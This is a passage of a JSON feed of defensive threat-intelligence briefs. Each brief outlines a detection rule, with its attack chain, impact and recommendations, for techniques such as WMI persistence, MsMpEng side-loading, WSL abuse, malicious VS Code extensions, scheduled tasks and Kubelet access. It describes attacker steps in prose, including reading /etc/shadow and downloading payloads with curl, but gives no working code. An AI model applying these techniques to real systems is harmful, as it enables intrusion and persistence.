a command-line tool used to compile Managed Object Format (MOF) files. Attackers can abuse MOF files to manipulate the Windows Management Instrumentation (WMI) repository by building malicious WMI scripts for persistence or execution. This can be achieved by creating their own namespaces and classes within WMI or establishing persistence through WMI Event Subscriptions. The rule identifies unusual mofcomp.exe activity by filtering out legitimate processes and focusing on unusual executions, excluding known safe parent processes like \u003ccode\u003eScenarioEngine.exe\u003c/code\u003e and system accounts (\u003ccode\u003eS-1-5-18\u003c/code\u003e). This detection is designed to work with data from Elastic Defend, Microsoft Defender XDR, Crowdstrike, and Windows Security Event Logs. The rule aims to detect potential misuse of WMI for malicious purposes, enhancing the visibility of attacker techniques for execution and persistence.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., through phishing or exploitation of a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads a malicious MOF file to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003emofcomp.exe\u003c/code\u003e to compile the malicious MOF file.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emofcomp.exe\u003c/code\u003e processes the MOF file, creating new namespaces and classes or modifying existing ones in the WMI repository.\u003c/li\u003e\n\u003cli\u003eIf the MOF file creates a WMI Event Subscription, it triggers the execution of a malicious script or binary when a specific event occurs.\u003c/li\u003e\n\u003cli\u003eThe malicious script or binary executes, performing actions such as installing malware, creating backdoors, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence through the WMI Event Subscription, ensuring continued access even after system reboots.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation via malicious MOF files can lead to persistent access, code execution, and system compromise. Attackers can use this technique to install malware, create backdoors, or steal sensitive data. The rule aims to detect early stages of such attacks, preventing significant damage. By establishing persistence, attackers can maintain long-term control over the compromised system, evading traditional detection methods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM to detect suspicious \u003ccode\u003emofcomp.exe\u003c/code\u003e activity and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging and command-line auditing on Windows systems to capture necessary events for the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on unusual MOF file paths, parent processes, and user accounts.\u003c/li\u003e\n\u003cli\u003eReview and monitor WMI namespaces and classes for unauthorized modifications or additions following any detected suspicious \u003ccode\u003emofcomp.exe\u003c/code\u003e activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-mofcomp-activity/","summary":"This rule detects suspicious mofcomp.exe activity, which attackers may leverage MOF files to manipulate the Windows Management Instrumentation (WMI) repository for execution and persistence by filtering out legitimate processes and focusing on unusual executions, excluding known safe parent processes and system accounts.","title":"Suspicious Mofcomp Activity","url":"https://feed.craftedsignal.io/briefs/2024-01-mofcomp-activity/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Antimalware Service Executable","Windows Defender","Microsoft Security Client","Elastic Defend","CrowdStrike Falcon","Microsoft Defender XDR","Sysmon"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","Elastic"],"content_html":"\u003cp\u003eThis detection identifies suspicious execution of the Microsoft Antimalware Service Executable (MsMpEng.exe) from non-standard paths or renamed instances. Attackers may attempt to evade defenses through DLL side-loading or by masquerading as the antimalware process. This technique is used to blend in with legitimate system activity and avoid detection by security tools. This rule is designed to detect instances where MsMpEng.exe is executed from unexpected locations or has been renamed, potentially indicating malicious activity. The rule leverages process monitoring data to identify deviations from the expected execution patterns of the antimalware service. This behavior has been seen associated with ransomware attacks, such as REvil.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious payload onto the system, placing it in a non-standard directory, such as a temporary folder or a user\u0026rsquo;s profile directory.\u003c/li\u003e\n\u003cli\u003eThe attacker renames or copies the legitimate MsMpEng.exe to the malicious payload\u0026rsquo;s location.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the renamed or copied MsMpEng.exe from the non-standard location. This is intended to mimic legitimate activity and evade detection.\u003c/li\u003e\n\u003cli\u003eThe malicious MsMpEng.exe then loads a malicious DLL through DLL side-loading, which executes arbitrary code within the context of the antimalware process.\u003c/li\u003e\n\u003cli\u003eThe malicious code performs actions such as disabling security controls, escalating privileges, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised system to move laterally within the network, compromising additional systems.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to complete system compromise, including the disabling of security controls, data theft, and ransomware deployment. This can result in significant financial losses, reputational damage, and disruption of business operations. Identifying and responding to this type of attack is critical to prevent further damage. The Sophos article references the REvil ransomware attack which impacted hundreds of businesses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture process execution events, including image path and command-line arguments, which are essential for detecting this behavior.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious MsMpEng.exe execution from unusual paths or renamed instances.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules to determine the legitimacy of the MsMpEng.exe execution and identify any potential malicious activity.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for instances where the process name is \u0026ldquo;MsMpEng.exe\u0026rdquo; but the executable path is outside the standard Windows Defender or Microsoft Security Client directories.\u003c/li\u003e\n\u003cli\u003eReview the references provided for additional context and guidance on investigating this type of activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-windefend-unusual-path/","summary":"Detects suspicious execution of the Microsoft Antimalware Service Executable (MsMpEng.exe) from non-standard paths or renamed instances, which may indicate an attempt to evade defenses through DLL side-loading or masquerading.","title":"Suspicious Microsoft Antimalware Service Executable Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-windefend-unusual-path/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Word","Excel","PowerPoint","Publisher","Access"],"_cs_severities":["low"],"_cs_tags":["persistence","execution","windows","image_load","scheduled_task"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies a suspicious image load (\u003ccode\u003etaskschd.dll\u003c/code\u003e) originating from Microsoft Office applications (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE, MSPUB.EXE, MSACCESS.EXE). The behavior suggests potential adversarial activity involving the creation of scheduled tasks through the Windows Component Object Model (COM). Attackers may exploit this technique to establish persistence, circumventing traditional monitoring focused on the \u003ccode\u003eschtasks.exe\u003c/code\u003e utility. The use of COM for scheduled task management allows for stealthier operation and evasion of standard security controls, making it a valuable persistence mechanism for malicious actors. The rule is designed for data generated by Elastic Defend, Sysmon, and other endpoint detection platforms.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser opens a malicious Microsoft Office document (e.g., Word, Excel).\u003c/li\u003e\n\u003cli\u003eThe document executes embedded macro code or exploits a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe macro or exploit leverages the Component Object Model (COM).\u003c/li\u003e\n\u003cli\u003eThe Office application (e.g., WINWORD.EXE) loads the \u003ccode\u003etaskschd.dll\u003c/code\u003e library, providing access to the Task Scheduler service.\u003c/li\u003e\n\u003cli\u003eThe COM interface is used to programmatically create a new scheduled task.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload at a later time or on a recurring basis.\u003c/li\u003e\n\u003cli\u003eThe malicious payload could be a script, executable, or command-line instruction.\u003c/li\u003e\n\u003cli\u003eUpon execution, the payload achieves the attacker\u0026rsquo;s objective, such as establishing persistence, downloading additional malware, or compromising the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging this technique can allow adversaries to maintain persistent access to a compromised system. This can lead to long-term data exfiltration, lateral movement within the network, and deployment of ransomware. The low severity score assigned to the original rule may underestimate the potential impact, as persistence is a critical component of many advanced attacks. Affected systems may require extensive remediation to remove all traces of the malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Office Application Loading Task Scheduler DLL\u0026rdquo; to your SIEM and tune for your environment to detect this specific activity.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 7 (Image Loaded) logging on Windows endpoints to provide visibility into DLL loading events, which is a prerequisite for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the specific scheduled tasks that are created and the payloads they execute.\u003c/li\u003e\n\u003cli\u003eMonitor for scheduled task creation events (Event ID 4698) and deletion events (Event ID 4699) in the Windows Event Logs, as referenced in the rule\u0026rsquo;s investigation guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-suspicious-image-load-office/","summary":"Detection of taskschd.dll image loads from Microsoft Office applications indicates potential COM-based scheduled task creation for persistence, bypassing traditional schtasks.exe usage.","title":"Suspicious Image Load (taskschd.dll) from MS Office","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-image-load-office/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["low"],"_cs_tags":["defense-evasion","execution","credential-access","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Subsystem for Linux (WSL) enables users to run Linux binaries natively on Windows, creating an opportunity for adversaries to evade detection by executing malicious Linux commands without triggering traditional Windows security alerts. This technique involves leveraging WSL\u0026rsquo;s bash shell to perform actions that might otherwise be flagged if executed directly within the Windows environment. This alert focuses on detecting suspicious behaviors indicative of malicious use of WSL, such as unauthorized access to sensitive files, use of network tools, or unusual command-line arguments. This can be used to facilitate lateral movement, data exfiltration, or other malicious activities. The Qualys blog post \u0026ldquo;Implications of Windows Subsystem for Linux for Adversaries \u0026amp; Defenders\u0026rdquo; (2022-03-22) describes this attack vector in detail.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker enables WSL if it is not already enabled.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ewsl.exe\u003c/code\u003e to start a Linux environment.\u003c/li\u003e\n\u003cli\u003eInside the WSL environment, the attacker uses \u003ccode\u003ebash\u003c/code\u003e to execute malicious commands.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to access sensitive files such as \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e to gather credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses network tools like \u003ccode\u003ecurl\u003c/code\u003e to download or upload malicious payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker executes scripts to establish persistence within the WSL environment.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised WSL environment to move laterally to other systems or exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation via WSL can lead to a variety of negative outcomes, including unauthorized access to sensitive information, credential compromise, and lateral movement within the network. While specific victim counts are unavailable, this technique can significantly increase the attack surface and reduce the effectiveness of traditional Windows-based security measures, affecting organizations across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture \u003ccode\u003ewsl.exe\u003c/code\u003e and \u003ccode\u003ebash.exe\u003c/code\u003e executions (reference: Sysmon Event ID 1 setup in rule setup section).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious WSL Activity\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process command lines for suspicious arguments used with \u003ccode\u003ewsl.exe\u003c/code\u003e, such as access to \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e (reference: Sigma rule selection criteria).\u003c/li\u003e\n\u003cli\u003eInvestigate and whitelist legitimate uses of WSL within your environment to reduce false positives (reference: False positive analysis in the rule description).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wsl-bash-exec/","summary":"Adversaries may leverage the Windows Subsystem for Linux (WSL) to execute malicious Linux commands, bypassing traditional Windows security measures, detected by monitoring process execution and command-line arguments.","title":"Suspicious Execution via Windows Subsystem for Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-wsl-bash-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["VS Code"],"_cs_severities":["medium"],"_cs_tags":["initial-access","execution","supply-chain-compromise","vscode"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eA malicious VS Code extension, configured to run upon editor startup, can execute arbitrary commands, potentially leading to the installation of remote access trojans (RATs) or other malicious payloads. The attack vector leverages the extension host under \u003ccode\u003e.vscode/extensions/\u003c/code\u003e to spawn processes such as script interpreters or download utilities. This activity has been observed in campaigns like the fake Clawdbot extension that installed ScreenConnect RAT. The execution can involve Living-off-the-Land binaries (LOLBins) or recently created executables from non-standard paths, posing a significant risk to Windows systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user installs a malicious VS Code extension.\u003c/li\u003e\n\u003cli\u003eThe extension is configured with \u003ccode\u003eactivationEvents: [\u0026quot;onStartupFinished\u0026quot;]\u003c/code\u003e to run automatically when VS Code starts.\u003c/li\u003e\n\u003cli\u003eThe VS Code extension host (\u003ccode\u003eCode.exe\u003c/code\u003e or \u003ccode\u003enode.exe\u003c/code\u003e) spawns a script interpreter (e.g., \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e) from within the \u003ccode\u003e.vscode/extensions/\u003c/code\u003e directory.\u003c/li\u003e\n\u003cli\u003eThe script interpreter executes a command to download a malicious payload from a remote server using tools like \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003ebitsadmin.exe\u003c/code\u003e, or \u003ccode\u003emshta.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often in a temporary directory outside of Program Files.\u003c/li\u003e\n\u003cli\u003eThe script interpreter executes the downloaded payload, leading to further malicious activity. For example, ScreenConnect might be installed.\u003c/li\u003e\n\u003cli\u003ePersistence mechanisms are established (e.g., via registry keys or scheduled tasks).\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the complete compromise of a developer\u0026rsquo;s workstation, potentially affecting intellectual property and sensitive data. The installation of RATs like ScreenConnect can enable persistent remote access, allowing attackers to perform data exfiltration, lateral movement, and further malicious activities. The compromised machine can then be used as a pivot point to attack other systems within the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Suspicious Execution from VS Code Extension\u0026rdquo; Sigma rule to your SIEM to detect malicious process execution from VS Code extensions.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for script interpreters and LOLBins spawned from the \u003ccode\u003e.vscode/extensions/\u003c/code\u003e directory.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit installed VS Code extensions for suspicious activity or unnecessary permissions.\u003c/li\u003e\n\u003cli\u003eEducate developers about the risks of installing extensions from untrusted sources.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domains associated with ScreenConnect and other RATs at the firewall/DNS resolver.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-vscode-extension-execution/","summary":"Malicious VS Code extensions can execute arbitrary commands, leading to initial access and subsequent payload deployment on Windows systems.","title":"Suspicious Execution from VS Code Extension","url":"https://feed.craftedsignal.io/briefs/2024-01-vscode-extension-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud"],"_cs_severities":["medium"],"_cs_tags":["schtasks","scheduled-task","persistence","execution"],"_cs_type":"advisory","_cs_vendors":["Splunk"],"content_html":"\u003cp\u003eThis analytic detects the execution of Windows Scheduled Tasks on demand using the \u003ccode\u003eschtasks.exe\u003c/code\u003e utility. The detection focuses on identifying \u003ccode\u003eschtasks.exe\u003c/code\u003e being executed with the \u003ccode\u003erun\u003c/code\u003e command, which is often used by adversaries to force the execution of previously created scheduled tasks. This activity is significant because attackers frequently leverage scheduled tasks for persistent access, privilege escalation, or lateral movement within a compromised network. Detecting this behavior can help defenders identify and respond to malicious activity before it leads to further compromise. The technique has been associated with various threat actors and malware families including Qakbot, XMRig, and Medusa Ransomware as well as campaigns such as CISA AA22-257A and Industroyer2.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through various means (e.g., exploiting a vulnerability, phishing).\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence by creating a new scheduled task using \u003ccode\u003eschtasks.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003eschtasks.exe\u003c/code\u003e with the \u003ccode\u003erun\u003c/code\u003e command to trigger the malicious scheduled task on demand.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes a malicious payload, such as a script or executable.\u003c/li\u003e\n\u003cli\u003eThe payload may perform various malicious actions, such as downloading additional malware, escalating privileges, or gathering sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems on the network by creating and running scheduled tasks remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to disable security controls or evade detection by modifying existing scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or system disruption.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to persistent access, lateral movement, and privilege escalation within the compromised environment. Attackers can use this technique to maintain a foothold on the system, spread malware to other systems on the network, and ultimately achieve their objectives, such as data theft, ransomware deployment, or disruption of critical services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect the execution of \u003ccode\u003eschtasks.exe\u003c/code\u003e with the \u003ccode\u003erun\u003c/code\u003e command, tuning it to exclude known legitimate uses.\u003c/li\u003e\n\u003cli\u003eInvestigate any detected instances of \u003ccode\u003eschtasks.exe\u003c/code\u003e execution with the \u003ccode\u003erun\u003c/code\u003e command to determine if they are malicious.\u003c/li\u003e\n\u003cli\u003eMonitor process execution data for unusual or unexpected processes being launched by scheduled tasks.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and regularly review and audit scheduled tasks to prevent unauthorized modifications or creations.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging (Event ID 1) to capture detailed information about process executions, including command-line arguments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-schtasks-on-demand/","summary":"Detection of on-demand execution of Windows Scheduled Tasks via the schtasks.exe command-line utility, a common technique for persistence and lateral movement.","title":"Schtasks Run Task On Demand","url":"https://feed.craftedsignal.io/briefs/2024-01-03-schtasks-on-demand/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the creation of scheduled tasks on Windows systems originating from a remote source using Remote Procedure Call (RPC). The creation of scheduled tasks is a common technique used for persistence and execution. While administrators may legitimately use this functionality for remote management, adversaries also leverage it for lateral movement and executing malicious code on compromised systems. The rule specifically looks for RPC calls where the client locality and process ID are 0, suggesting the task was created remotely. Identifying this activity allows defenders to investigate potentially malicious lateral movement and unauthorized task execution. This activity has been observed across various Windows environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a network, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target system within the network accessible via RPC.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes an RPC connection to the target system.\u003c/li\u003e\n\u003cli\u003eUsing the RPC connection, the attacker creates a new scheduled task on the target system. The RpcCallClientLocality and ClientProcessId are set to 0 in the task creation event, indicating remote origin.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload or command. This could involve running a script, executable, or PowerShell command.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is triggered based on a defined schedule or event.\u003c/li\u003e\n\u003cli\u003eThe malicious payload executes on the target system, achieving the attacker\u0026rsquo;s objective.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system to further pivot within the network, repeating the process on other targets.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the establishment of persistence on the target system, allowing the attacker to maintain access even after reboots or credential changes. This can also facilitate lateral movement, enabling the attacker to compromise additional systems within the network. The impact could range from data theft and system disruption to full network compromise. Organizations may experience downtime, data loss, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable \u0026ldquo;Audit Other Object Access Events\u0026rdquo; to generate the Windows Security Event Logs required for detection (reference: Setup section in content).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM to detect remote scheduled task creation events (reference: rules section).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to determine the legitimacy of the scheduled task creation.\u003c/li\u003e\n\u003cli\u003eReview and restrict permissions for creating scheduled tasks, especially from remote sources, to prevent unauthorized task creation.\u003c/li\u003e\n\u003cli\u003eMonitor the TaskContent value to investigate the configured action of scheduled tasks created remotely (reference: Triage and analysis section in content).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-remote-task-creation/","summary":"The creation of scheduled tasks from a remote source via RPC, where the RpcCallClientLocality and ClientProcessId are 0, indicates potential adversary lateral movement within a Windows environment.","title":"Remote Scheduled Task Creation via RPC","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-task-creation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defend for Containers"],"_cs_severities":["high"],"_cs_tags":["container","kubelet","kubernetes","lateral-movement","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis rule detects potential direct Kubelet access via process arguments within Linux containers. Attackers may target the Kubelet API to gain unauthorized access to the Kubernetes API server or other sensitive resources within the cluster. Observed requests are often used for reconnaissance, such as enumerating pods and cluster resources, or for executing commands directly on the API server. This activity indicates a potential attempt to move laterally within the Kubernetes environment. The activity is detected by monitoring process arguments for HTTP requests directed at the Kubelet API on ports 10250 or 10255. The detection leverages Elastic Defend for Containers, introduced in version 9.3.0.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a container within the Kubernetes cluster, potentially through exploiting a vulnerable application.\u003c/li\u003e\n\u003cli\u003eThe attacker opens an interactive shell within the compromised container.\u003c/li\u003e\n\u003cli\u003eUsing command-line tools such as \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e, the attacker crafts an HTTP request targeting the Kubelet API, typically on port 10250 or 10255.\u003c/li\u003e\n\u003cli\u003eThe HTTP request is embedded within the process arguments, including specific Kubelet endpoints such as \u003ccode\u003e/pods\u003c/code\u003e, \u003ccode\u003e/exec\u003c/code\u003e, \u003ccode\u003e/run\u003c/code\u003e, or \u003ccode\u003e/logs\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to enumerate pods and other cluster resources by querying the \u003ccode\u003e/pods\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute commands within containers by leveraging the \u003ccode\u003e/exec\u003c/code\u003e or \u003ccode\u003e/run\u003c/code\u003e endpoints.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to retrieve container logs using the \u003ccode\u003e/logs\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eSuccessful exploitation allows the attacker to move laterally within the Kubernetes cluster, potentially gaining access to sensitive data or control over other resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of direct Kubelet access can lead to significant compromise within a Kubernetes cluster. Attackers can enumerate sensitive information, execute arbitrary commands within containers, and move laterally to other parts of the cluster. This can result in data exfiltration, denial of service, or complete cluster takeover. Due to the high level of access granted by Kubelet, a successful attack allows the attacker to take complete control over the target node.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM and tune them for your environment. Enable Elastic Defend for Containers with a minimum version of 9.3.0 to generate the necessary logs for these detections.\u003c/li\u003e\n\u003cli\u003eReview network policies to restrict pod access to Kubelet ports (10250, 10255) except from approved node-local agents (references: \u003ca href=\"https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster)\"\u003ehttps://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHarden Kubelet authentication and authorization by disabling anonymous access and requiring webhook authorization (references: \u003ca href=\"https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/)\"\u003ehttps://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eEnforce pod security policies to restrict privileged pods and host networking, reducing the attack surface for node API access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-kubelet-access/","summary":"Detection of potential direct Kubelet access via process arguments in Linux containers, which could lead to enumeration, execution, or lateral movement within the Kubernetes cluster.","title":"Potential Direct Kubelet Access via Process Arguments","url":"https://feed.craftedsignal.io/briefs/2024-01-kubelet-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon","Elastic Defend","Elastic Endpoint Security","CrowdStrike Falcon","SentinelOne Cloud Funnel","Windows Security Event Logs","winlogbeat"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows","wmi"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne","Elastic"],"content_html":"\u003cp\u003eWindows Management Instrumentation (WMI) provides a powerful framework for managing Windows systems, but adversaries can abuse its capabilities to establish persistence. By creating WMI event subscriptions, attackers can execute arbitrary code in response to defined system events. This technique involves creating event filters, providers, consumers, and bindings that automatically run malicious code. This can be achieved through tools like \u003ccode\u003ewmic.exe\u003c/code\u003e, which allows the creation of event consumers such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e. Successful exploitation of WMI for persistence allows attackers to maintain unauthorized access to a compromised system, even after reboots or other system changes. This activity has been observed across various environments, highlighting the need for robust detection mechanisms to identify and prevent WMI-based persistence.\u003c/p\u003e\n\u003ch2 